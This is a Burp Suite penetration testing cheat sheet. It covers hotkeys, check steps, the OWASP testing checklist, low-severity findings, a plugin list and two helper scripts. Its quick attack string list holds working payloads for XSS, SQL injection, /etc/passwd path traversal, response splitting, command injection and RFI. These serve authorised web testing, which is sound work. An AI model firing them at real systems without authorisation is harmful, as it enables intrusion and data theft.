Application Security - Tool Usage - Burpsuite

A cheat sheet for the PortSwigger Burp Suite application security testing framework. The hotkeys below are the Burp Suite 1.x defaults; in Burp Suite 2.x the Scanner and Alerts tabs were folded into the Dashboard, and every binding can be changed in the Hotkeys settings.

## Global

| Action | Shortcut |
|---|---|
| Send to Repeater | Ctrl+R |
| Send to Intruder | Ctrl+I |
| Forward intercepted Proxy message | Ctrl+F |
| Toggle Proxy interception | Ctrl+T |
| Switch to Target | Ctrl+Shift+T |
| Switch to Proxy | Ctrl+Shift+P |
| Switch to Scanner | Ctrl+Shift+S |
| Switch to Intruder | Ctrl+Shift+I |
| Switch to Repeater | Ctrl+Shift+R |
| Switch to Suite options | Ctrl+Shift+O |
| Switch to Alerts tab | Ctrl+Shift+A |
| Go to previous tab | Ctrl+Minus |
| Go to next tab | Ctrl+Equals |

## Editor

| Action | Shortcut |
|---|---|
| Cut | Ctrl+X |
| Copy | Ctrl+C |
| Paste | Ctrl+V |
| Undo | Ctrl+Z |
| Redo | Ctrl+Y |
| Select all | Ctrl+A |
| Search | Ctrl+S |
| Go to previous search match | Ctrl+Comma |
| Go to next search match | Ctrl+Period |
| URL-decode | Ctrl+Shift+U |
| URL-encode key characters | Ctrl+U |
| HTML-decode | Ctrl+Shift+H |
| HTML-encode key characters | Ctrl+H |
| Base64-decode | Ctrl+Shift+B |
| Base64-encode | Ctrl+B |
| Backspace word | Ctrl+Backspace |
| Delete word | Ctrl+Delete |
| Delete line | Ctrl+D |
| Go to previous word | Ctrl+Left |
| Go to previous word (extend selection) | Ctrl+Shift+Left |
| Go to next word | Ctrl+Right |
| Go to next word (extend selection) | Ctrl+Shift+Right |
| Go to previous paragraph | Ctrl+Up |
| Go to previous paragraph (extend selection) | Ctrl+Shift+Up |
| Go to next paragraph | Ctrl+Down |
| Go to next paragraph (extend selection) | Ctrl+Shift+Down |
| Go to start of document | Ctrl+Home |
| Go to start of document (extend selection) | Ctrl+Shift+Home |
| Go to end of document | Ctrl+End |
| Go to end of document (extend selection) | Ctrl+Shift+End |

 

BASIC PASSIVE AND ACTIVE CHECKS:

Burpsuite Spider with intelligent form submission
Manual crawl of website through Burpsuite proxy, submitting INJECTX payloads in every input (the INJECTX string is a canary: searching the proxy history for it shows where and how each input is reflected)
Burpsuite passive scan
Burpsuite engagement tools > Search > <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
Burpsuite engagement tools > Find comments
Burpsuite engagement tools > Find scripts
Burpsuite engagement tools > Find references
Burpsuite engagement tools > Analyze target
Burpsuite engagement tools > Discover content
Burpsuite Intruder > file/directory brute force
Burpsuite Intruder > HTTP methods, user agents, etc.
Enumerate all software technologies, HTTP methods, and potential attack vectors
Understand the function of the site, what types of data are stored or valuable, what sorts of functions are worth attacking, etc.
ENUMERATION:
OPERATING SYSTEM
WEB SERVER
DATABASE SERVERS
PROGRAMMING LANGUAGES
PLUGINS/VERSIONS
OPEN PORTS
USERNAMES
SERVICES
WEB SPIDERING
GOOGLE HACKING
VECTORS:
INPUT FORMS
GET/POST PARAMS
URI/REST STRUCTURE
COOKIES
HEADERS
SEARCH STRINGS:
Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...

fname|phone|id|org_name|name|email
QUICK ATTACK STRINGS:
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...

Company
First Last
username
username@mailinator.com
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt%00.png
https://google.com/.injectx/rfi_vuln.txt%00.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' -- 
"></textarea><img/onload=alert(1)>' -- 
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)</ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!-- 
"><img/onload=alert(1)>' -- // INJECTX <!-- 
INJECTX'"><h1>X<!-- 
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd%00
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"-- 
admin' or '1'='1'-- 
INJECTX%0a%0d%00
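The passive checks above (search the proxy history for the regex terms) and the INJECTX quick strings (find where the canary is reflected and whether the metacharacters around it survived) can both be run offline against a Burp "Save items" XML export. The script below is an added example, not part of the original cheat sheet or of Burp itself; it parses Burp's item XML (base64-encoded request/response inside CDATA), runs the search regex from the checks list over every response body, and for each reflected INJECTX compares the characters on either side with the quick string `'>"></INJECTX>(1)` position by position, so stray `<` or `>` from unrelated markup next to the canary are not counted. The sample export, hostnames and responses are constructed for the demonstration.

```python
import base64
import re
import xml.etree.ElementTree as ET

# The "engagement tools > Search" terms from the checks list, as one case-insensitive regex.
SEARCH_RE = re.compile(
    r"<form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|"
    r"Location|crowdshield|xerosecurity|username|password|document\.|location\.|"
    r"eval\(|exec\(|\?wsdl|\.wsdl",
    re.IGNORECASE,
)

# The quick string '>"></INJECTX>(1) split around its canary.
CANARY = "INJECTX"
PAYLOAD_PREFIX = "'>\"></"
PAYLOAD_SUFFIX = ">(1)"
METACHARS = ["<", ">", "'", '"']


def decode_field(item, tag):
    """Text of <tag> inside an <item>, base64-decoded when Burp flagged it base64="true"."""
    el = item.find(tag)
    if el is None or el.text is None:
        return ""
    if el.get("base64") == "true":
        return base64.b64decode(el.text).decode("utf-8", "replace")
    return el.text


def parse_burp_items(xml_text):
    """Parse a Burp 'Save items' export into dicts with decoded request/response."""
    root = ET.fromstring(xml_text)
    return [{"url": item.findtext("url") or "",
             "method": item.findtext("method") or "",
             "status": item.findtext("status") or "",
             "request": decode_field(item, "request"),
             "response": decode_field(item, "response")}
            for item in root.iter("item")]


def response_body(message):
    """Everything after the first blank line of an HTTP message."""
    head, sep, body = message.partition("\r\n\r\n")
    if not sep:
        head, sep, body = message.partition("\n\n")
    return body


def search_hits(items):
    """Run SEARCH_RE over each response body; map URL -> sorted lower-cased matched terms."""
    hits = {}
    for it in items:
        terms = sorted({m.group(0).lower() for m in SEARCH_RE.finditer(response_body(it["response"]))})
        if terms:
            hits[it["url"]] = terms
    return hits


def canary_reflections(items):
    """For each reflected CANARY, list the payload metacharacters that came back at the exact
    position the payload put them, and whether the whole quick string survived verbatim."""
    findings = []
    for it in items:
        body = response_body(it["response"])
        for m in re.finditer(re.escape(CANARY), body):
            before = body[max(0, m.start() - len(PAYLOAD_PREFIX)):m.start()]
            after = body[m.end():m.end() + len(PAYLOAD_SUFFIX)]
            survived = set()
            for sent, got in zip(reversed(PAYLOAD_PREFIX), reversed(before)):
                if sent in METACHARS and sent == got:
                    survived.add(sent)
            for sent, got in zip(PAYLOAD_SUFFIX, after):
                if sent in METACHARS and sent == got:
                    survived.add(sent)
            findings.append({"url": it["url"], "status": it["status"],
                             "context": before + CANARY + after,
                             "unencoded": [c for c in METACHARS if c in survived],
                             "verbatim": before.endswith(PAYLOAD_PREFIX) and after.startswith(PAYLOAD_SUFFIX)})
    return findings


def make_item(url, method, status, request, response):
    """Build one <item> in the shape Burp writes (CDATA + base64). Constructed sample data."""
    b64 = lambda s: base64.b64encode(s.encode()).decode()
    return (f"<item><url><![CDATA[{url}]]></url><method>{method}</method><status>{status}</status>"
            f'<request base64="true"><![CDATA[{b64(request)}]]></request>'
            f'<response base64="true"><![CDATA[{b64(response)}]]></response></item>')


# Constructed sample: one raw reflection (XSS candidate), one HTML-encoded reflection in an Oracle error.
URL_A = "https://target.example/search?q=INJECTX"
URL_B = "https://target.example/profile?id=INJECTX"
SAMPLE_XML = "<items>" + make_item(
    URL_A, "GET", "200",
    "GET /search?q=%27%3E%22%3E%3C/INJECTX%3E(1) HTTP/1.1\r\nHost: target.example\r\n\r\n",
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><body>Results for '>\"></INJECTX>(1)<!-- debug --></body></html>",
) + make_item(
    URL_B, "GET", "500",
    "GET /profile?id=%27%3E%22%3E%3C/INJECTX%3E(1) HTTP/1.1\r\nHost: target.example\r\n\r\n",
    "HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n"
    "<html><body>ORA-00933: SQL command not properly ended. Query: "
    "&#39;&gt;&quot;&gt;&lt;/INJECTX&gt;(1)</body></html>",
) + "</items>"

if __name__ == "__main__":
    items = parse_burp_items(SAMPLE_XML)
    for url, terms in search_hits(items).items():
        print(url, terms)
    for f in canary_reflections(items):
        print(f["url"], f["status"], f["unencoded"], "verbatim" if f["verbatim"] else "encoded")
```

Point the script at a real export (Proxy > HTTP history > select items > Save items) instead of `SAMPLE_XML`; a reflection with all four metacharacters unencoded is the one to send to Repeater first, while an encoded reflection inside an `ORA-`/`SQL` error message is an injection lead rather than an XSS lead.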
OWASP TESTING CHECKLIST:
IDs follow the OWASP Testing Guide v3 numbering.

| ID | Test | Weakness |
|---|---|---|
| IG-001 | Spiders, Robots and Crawlers | |
| IG-002 | Search Engine Discovery/Reconnaissance | |
| IG-003 | Identify application entry points | |
| IG-004 | Testing for Web Application Fingerprint | |
| IG-005 | Application Discovery | |
| IG-006 | Analysis of Error Codes | |
| CM-001 | SSL/TLS Testing (SSL version, algorithms, key length, digital cert. validity) | SSL weakness |
| CM-002 | DB Listener Testing | DB Listener weak |
| CM-003 | Infrastructure Configuration Management Testing | Infrastructure configuration management weakness |
| CM-004 | Application Configuration Management Testing | Application configuration management weakness |
| CM-005 | Testing for File Extensions Handling | File extensions handling |
| CM-006 | Old, backup and unreferenced files | Old, backup and unreferenced files |
| CM-007 | Infrastructure and Application Admin Interfaces | Access to admin interfaces |
| CM-008 | Testing for HTTP Methods and XST | HTTP methods enabled, XST permitted, HTTP verb |
| AT-001 | Credentials transport over an encrypted channel | Credentials transport over an encrypted channel |
| AT-002 | Testing for user enumeration | User enumeration |
| AT-003 | Testing for Guessable (Dictionary) User Account | Guessable user account |
| AT-004 | Brute Force Testing | Credentials brute forcing |
| AT-005 | Testing for bypassing authentication schema | Bypassing authentication schema |
| AT-006 | Testing for vulnerable remember password and pwd reset | Vulnerable remember password, weak pwd reset |
| AT-007 | Testing for Logout and Browser Cache Management | Logout function not properly implemented, browser cache weakness |
| AT-008 | Testing for CAPTCHA | Weak CAPTCHA implementation |
| AT-009 | Testing Multiple Factors Authentication | Weak multiple factors authentication |
| AT-010 | Testing for Race Conditions | Race conditions vulnerability |
| SM-001 | Testing for Session Management Schema | Bypassing session management schema, weak session token |
| SM-002 | Testing for Cookies attributes | Cookies set without 'HttpOnly' and 'Secure', and with no time validity |
| SM-003 | Testing for Session Fixation | Session fixation |
| SM-004 | Testing for Exposed Session Variables | Exposed sensitive session variables |
| SM-005 | Testing for CSRF | CSRF |
| AZ-001 | Testing for Path Traversal | Path traversal |
| AZ-002 | Testing for bypassing authorization schema | Bypassing authorization schema |
| AZ-003 | Testing for Privilege Escalation | Privilege escalation |
| BL-001 | Testing for Business Logic | Bypassable business logic |
| DV-001 | Testing for Reflected Cross Site Scripting | Reflected XSS |
| DV-002 | Testing for Stored Cross Site Scripting | Stored XSS |
| DV-003 | Testing for DOM based Cross Site Scripting | DOM XSS |
| DV-004 | Testing for Cross Site Flashing | Cross Site Flashing |
| DV-005 | SQL Injection | SQL Injection |
| DV-006 | LDAP Injection | LDAP Injection |
| DV-007 | ORM Injection | ORM Injection |
| DV-008 | XML Injection | XML Injection |
| DV-009 | SSI Injection | SSI Injection |
| DV-010 | XPath Injection | XPath Injection |
| DV-011 | IMAP/SMTP Injection | IMAP/SMTP Injection |
| DV-012 | Code Injection | Code Injection |
| DV-013 | OS Commanding | OS Commanding |
| DV-014 | Buffer overflow | Buffer overflow |
| DV-015 | Incubated vulnerability | Incubated vulnerability |
| DV-016 | Testing for HTTP Splitting/Smuggling | HTTP splitting, smuggling |
| DS-001 | Testing for SQL Wildcard Attacks | SQL wildcard vulnerability |
| DS-002 | Locking Customer Accounts | Locking customer accounts |
| DS-003 | Testing for DoS Buffer Overflows | Buffer overflows |
| DS-004 | User Specified Object Allocation | User specified object allocation |
| DS-005 | User Input as a Loop Counter | User input as a loop counter |
| DS-006 | Writing User Provided Data to Disk | Writing user provided data to disk |
| DS-007 | Failure to Release Resources | Failure to release resources |
| DS-008 | Storing too Much Data in Session | Storing too much data in session |
| WS-001 | WS Information Gathering | N.A. |
| WS-002 | Testing WSDL | WSDL weakness |
| WS-003 | XML Structural Testing | Weak XML structure |
| WS-004 | XML content-level Testing | XML content-level |
| WS-005 | HTTP GET parameters/REST Testing | WS HTTP GET parameters/REST |
| WS-006 | Naughty SOAP attachments | WS naughty SOAP attachments |
| WS-007 | Replay Testing | WS replay testing |
| AJ-001 | AJAX Vulnerabilities | N.A. |
| AJ-002 | AJAX Testing | AJAX weakness |
LOW SEVERITY:
A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests. The entries below merge several such out-of-scope lists, with duplicates removed and items grouped by theme.

Information disclosure:
Descriptive error messages (e.g. stack traces, application or server errors).
HTTP 404 codes/pages or other HTTP non-200 codes/pages.
Fingerprinting / banner disclosure on common/public services.
Disclosure of known public files or directories (e.g. robots.txt).
Vulnerability reports based only on the reported version numbers of web servers, services, or frameworks.
Known vulnerable libraries.
Incorrect charset.
Security best practices without accompanying proof-of-concept exploitation.

Authentication and accounts:
Username / email enumeration via login page error message, forgot password error message, password reset, or registration.
Login or forgot password page brute force with account lockout not enforced; issues related to rate limiting.
Weak password / lack of password security policy (brute-forceable passwords).
Weak CAPTCHA / CAPTCHA bypass.
Presence of application or web browser 'autocomplete' or 'save password' functionality; autocomplete enabled on password fields (HTML autocomplete).
Forgot password autologin; autologin token reuse.

Sessions and cookies:
Lack of Secure / HttpOnly flags on (non-sensitive) cookies; insecure cookies.
Cookie valid after logout; cookie valid after password reset; cookie expiration.
Session ID or login sent over HTTP; HTTP enabled.

CSRF and clickjacking:
Clickjacking and issues only exploitable through clickjacking.
CSRF on non-sensitive forms or on forms available to anonymous users (e.g. the contact form); missing CSRF protection on non-sensitive functionality.
Logout cross-site request forgery (logout CSRF).
HTML form abuse (denial of service).
Same Site Scripting.

HTTP methods:
OPTIONS HTTP method enabled.
TRACE HTTP method enabled.

SSL/TLS:
SSL attacks such as BEAST, BREACH, renegotiation attack.
SSL forward secrecy not enabled.
SSL weak / insecure cipher suites; SSL vulnerabilities related to configuration or version.
HTTPS mixed content scripts.
Strict-Transport-Security not enabled for HTTPS; weak HSTS max-age (86,000 or less).

Missing HTTP security headers (https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.:
Strict-Transport-Security
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options (anti-MIME-sniffing; content sniffing not disabled)
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
Content-Security-Policy-Report-Only

Cross-domain policy:
crossdomain.xml allows all domains; cross-domain access policy scoped to a whole domain (e.g. *.netflix.com).
HTML5 allowed domains; cross origin policy.
Lack of SPF records (email spoofing).
Lack of security speedbump when leaving the site.

Denial of service and out-of-scope activity:
Denial of service attacks; resource exhaustion attacks.
Attacks on third-party ad services.
Physical testing.
A service listening on port 80 in addition to 443 (e.g. api*.netflix.com listens on port 80).

Issues only present in old browsers / old plugins / end-of-life software:
IE < 9
Chrome < 40
Firefox < 35
Safari < 7
Opera < 13
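Most of the header, cookie, HSTS and HTTP-method items in this list can be checked mechanically from one response. The script below is an added example, not from the original page or from any bug bounty program; it parses raw response headers and reports the findings above that apply, using the list's own "86,000 or less" HSTS threshold. The two sample responses (a weak one and its hardened counterpart) and the hostnames in them are constructed for the demonstration; the Allow header is what an OPTIONS probe would return. X-XSS-Protection is left out deliberately because current browsers ignore it.

```python
import re

# Headers whose absence the list above files as low severity.
REQUIRED_HEADERS = [
    "strict-transport-security",
    "x-frame-options",
    "x-content-type-options",
    "content-security-policy",
]
HSTS_WEAK_MAX_AGE = 86000  # threshold quoted in the list above ("86,000 or less")


def parse_headers(raw):
    """'Name: value' lines -> list of (lowercase name, value); duplicates (Set-Cookie) are kept."""
    out = []
    for line in raw.splitlines():
        if line.startswith("HTTP/") or ":" not in line:
            continue
        name, _, value = line.partition(":")
        out.append((name.strip().lower(), value.strip()))
    return out


def values(headers, name):
    return [v for n, v in headers if n == name]


def check_cookie(set_cookie):
    """Findings for one Set-Cookie value: missing Secure / HttpOnly flags."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    findings = []
    if "secure" not in attrs:
        findings.append(f"cookie {name}: missing Secure flag")
    if "httponly" not in attrs:
        findings.append(f"cookie {name}: missing HttpOnly flag")
    return findings


def low_severity_findings(raw_headers, body="", scheme="https"):
    """Return the low-severity findings from the list above that a single response exhibits."""
    headers = parse_headers(raw_headers)
    present = {n for n, _ in headers}
    findings = [f"missing header: {h}" for h in REQUIRED_HEADERS if h not in present]

    for hsts in values(headers, "strict-transport-security"):
        m = re.search(r"max-age=(\d+)", hsts, re.IGNORECASE)
        if not m or int(m.group(1)) <= HSTS_WEAK_MAX_AGE:
            findings.append(f"weak HSTS max-age: {hsts}")

    for xcto in values(headers, "x-content-type-options"):
        if xcto.lower() != "nosniff":
            findings.append("X-Content-Type-Options present but not 'nosniff'")

    # Allow: comes back from an OPTIONS probe; TRACE enabled is the XST item.
    allowed = {t.strip().upper() for a in values(headers, "allow") for t in a.split(",")}
    for verb in ("OPTIONS", "TRACE"):
        if verb in allowed:
            findings.append(f"{verb} HTTP method enabled")

    for cookie in values(headers, "set-cookie"):
        findings.extend(check_cookie(cookie))
    if scheme == "http" and values(headers, "set-cookie"):
        findings.append("session/login cookie sent over HTTP")

    if scheme == "https" and re.search(r"<script[^>]+src=[\"']http://", body, re.IGNORECASE):
        findings.append("HTTPS mixed content script")
    return findings


# Constructed sample responses (not captured from any real site).
WEAK_HEADERS = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/
Strict-Transport-Security: max-age=3600
Allow: GET, POST, OPTIONS, TRACE
"""
WEAK_BODY = '<html><script src="http://cdn.example/app.js"></script></html>'

HARDENED_HEADERS = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/; Secure; HttpOnly; SameSite=Lax
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'
Allow: GET, POST
"""
HARDENED_BODY = '<html><script src="https://cdn.example/app.js"></script></html>'

if __name__ == "__main__":
    for label, hdrs, body in (("weak", WEAK_HEADERS, WEAK_BODY), ("hardened", HARDENED_HEADERS, HARDENED_BODY)):
        print(label, low_severity_findings(hdrs, body) or ["no low-severity findings"])
```

Paste the raw headers from a Repeater response into `raw_headers` (the status line is skipped); the weak sample yields nine findings and the hardened one none, which is the before/after a report for these items should show.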

PLUGINS:
Burp extensions (JAR and Python) collected for the workflow above; the comments after # are one-line descriptions.

jsEncrypter.0.3  # encrypts request data for apps that encrypt parameters client-side
HackBar.jar
LFI scanner checks.jar  # LFI detection
burp-vulners-scanner-1.2.jar  # matches fingerprints against the Vulners vulnerability database
burplogger++.jar  # extended logging
chunked-coding-converter.0.2.1.jar  # WAF bypass via chunked transfer encoding
domain_hunter-v1.4.jar  # domain name collection
knife-v1.4.jar  # character/encoding conversion
reCAPTCHA-v0.9.jar  # brute forcing behind CAPTCHAs
sqlmap.jar  # sqlmap API
AES-Encrypter
Assassin  # subdomain brute force | same-server (side-site) lookup
AuthMatrix  # authorization / privilege escalation testing
Blazer  # AMF messages
BurpAMFDSer  # AMF
BurpAuthzPlugin  # can be replaced by AuthMatrix
BurpCSJ
BurpDOMXSS
BurpHeartbleedExtension
BurpHistorytoMysql
BurpJDSer-ng
BurpJDSer
BurpMultiDEC
BurpNotesExtension
BurpPassiveXssScan
BurpPatchMe
BurpSentinel
BurpSessionAuth
BurpSmartBuster
BurpWebSphere
Burp_CustomScannerChecks
Burp_saml  # single sign-on (SAML)
DOMXSSHilight
J2EEScan  # can be replaced by LFI scanner checks
JSON
JavaScriptInjector  # JS injection
MobileMiTM  # man-in-the-middle
POST2JSON
PT-Manager
Refeffer
SAMLRaider
W3af  # firewall (WAF) type detection
WCF-Binary-SOAP-Plug-In  # WCF-related
Wsdler
Yara-Scanner  # malicious sample identification
aesburp AES Tool
autoEdit
burp-Curlit
burp-git-bridge
burp-massimpo
burp-msc
burp-protobuf-decoder
burp-radamsa
burp_Gwtscan
burp_JSBeautifier
burp_extension-googlehack
burp_extension_MultiScanner
burp_extension_nmap_parser
burp_extension_payloadparser
burp_wicket_handler
CSRFScanner  # CSRF detection
distribute-damage
faraday
scriptgen
sleepy-puppy
xssValidator
xssless
BurpCO2_v1_0_0RC1.jar
BurpFlashCSRFBuilder-0.1.4.jar
BurpKit.jar
BurpMultiProxy.jar
BurpMultiProxy_ListVer.jar
BurpPlugin-full.jar
Burp_MultiProxy.py
GrabTencentExmailContacts.jar
JavaSerialKiller.jar
activeScan++.py
aesburp_fat.jar
burp-image-size.jar
burp-paramalyzer.jar
burp-retire-js-2.jar
burpbuddy-2.0.0.jar
bypasswaf.jar  # WAF bypass
changeu.py
csrf-master.zip
parrotng_v0.2.jar
rhinauditor-burp-plugin-1.jar
scriptgen-burp-plugin-3.jar
sentinelburp.xpi
shodanapi.py
sitemap-Import_links.py
threadfix-release-2.jar
ws.jar
